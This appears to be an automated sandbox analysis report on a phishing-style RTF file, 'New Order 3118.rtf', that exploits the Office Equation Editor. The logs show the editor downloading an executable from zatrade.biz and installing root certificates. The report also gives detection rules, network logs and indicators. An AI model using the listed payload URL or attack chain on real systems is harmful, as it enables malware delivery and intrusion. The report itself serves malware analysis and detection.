Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order 3118.rtf

Overview

General Information

Sample name:New Order 3118.rtf
Analysis ID:1416057
MD5:99a565b1df705062e82bd4d7587c2959
SHA1:1817b3ef54cf96f71bbb581ef21c37c820c125f0
SHA256:e8fac55896700a6e6505cc1b8d4f98570358c0a1275564d587845cfb5ec47068
Tags:HUNrtf
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2104 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1096 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • EQNEDT32.EXE (PID: 3264 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
New Order 3118.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x141:$obj2: \objdata
  • 0x157:$obj3: \objupdate
  • 0x119:$obj5: \objautlink

Sigma Signatures

Exploits

barindex
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.236.228.49, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

System Summary

barindex
Sigma detected: Equation Editor Network Connection
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 185.236.228.49, SourceIsIpv6: false, SourcePort: 80
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1096, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Sigma detected: Office Macro File Creation
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2104, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: New Order 3118.rtfReversingLabs: Detection: 36%

Exploits

barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.236.228.49 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.236.228.49 Port: 443Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 185.236.228.49:443 -> 192.168.2.22:49166 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global trafficDNS query: name: zatrade.biz
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global trafficTCP traffic: 185.236.228.49:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global trafficTCP traffic: 185.236.228.49:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 185.236.228.49:80 -> 192.168.2.22:49165
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 185.236.228.49:443 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.236.228.49:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.236.228.49:80
Source: Joe Sandbox ViewASN Name: EVOLIX-ASFR EVOLIX-ASFR
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /6nSkW0jqkE1okon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zatrade.bizConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{766A1BB3-4D83-4EF3-8227-676B1863F934}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /6nSkW0jqkE1okon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zatrade.bizConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: zatrade.biz
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zatrade.biz/6nSkW0jqk
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exe
Source: EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exeW
Source: EQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zatrade.biz/6nSkW0jqkE1okon.exej
Source: EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zatrade.biz/
Source: EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zatrade.biz/6nSkW0jqkE1okon.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownHTTPS traffic detected: 185.236.228.49:443 -> 192.168.2.22:49166 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: New Order 3118.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055A7AA2_2_0055A7AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: New Order 3118.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engineClassification label: mal80.expl.winRTF@3/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$w Order 3118.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5D5B.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: New Order 3118.rtfReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: New Order 3118.LNK.0.drLNK file: ..\..\..\..\..\Desktop\New Order 3118.rtf
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00548F44 push eax; retf 2_2_00548F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00554F4E push edx; ret 2_2_00554F4F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00555A03 push ebx; ret 2_2_00555A07
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00554A02 push esp; ret 2_2_00554A03
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00554A0A push esp; ret 2_2_00554A0B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055773C push esp; ret 2_2_0055773F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055783E push esp; ret 2_2_0055783F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055772E push esp; ret 2_2_0055772F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055782E push esp; ret 2_2_0055782F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00555EDC push edx; ret 2_2_00555EE3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005577DE push esp; ret 2_2_005577DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005479CC push 40005478h; retf 0056h2_2_005479D1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005401F4 push eax; retf 2_2_005401F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005547F3 push esp; ret 2_2_005547F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005577FE push esp; ret 2_2_005577FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00555CFB push edx; ret 2_2_00555CFF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005464E4 push ebp; iretd 2_2_005464E5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005577EE push esp; ret 2_2_005577EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00557798 push esp; ret 2_2_0055779F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0055778C push esp; ret 2_2_0055778F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00554FB6 push ebx; ret 2_2_00554FB7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005577BE push esp; ret 2_2_005577BF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00554FAE push ebx; ret 2_2_00554FAF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005577AE push esp; ret 2_2_005577AF

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
